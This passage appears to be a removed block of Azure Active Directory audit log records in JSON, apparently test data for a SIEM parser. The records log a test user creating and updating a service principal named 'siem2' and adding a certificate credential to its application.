"Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "[\r\n  true\r\n]", "OldValue": "[]", "Name": "AccountEnabled"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n  \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]", "OldValue": "[]", "Name": "ServicePrincipalName"}, {"Name": "Credential", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"CredentialType\": 2,\r\n    \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n    \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826392"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "KeyDescription", "OldValue": "[]", "NewValue": "[\r\n  \"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\"\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "KeyDescription"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"KeyDescription\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826385"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application \u2013 Certificates and secrets management ", "Id": "20a82fa1-625b-491a-a3e8-54d779a9b17e"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n  \"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\"\r\n]", "OldValue": "[]", "Name": "KeyDescription"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "KeyDescription"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"KeyDescription\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826385"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application \u2013 Certificates and secrets management ", "Id": "20a82fa1-625b-491a-a3e8-54d779a9b17e"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"}
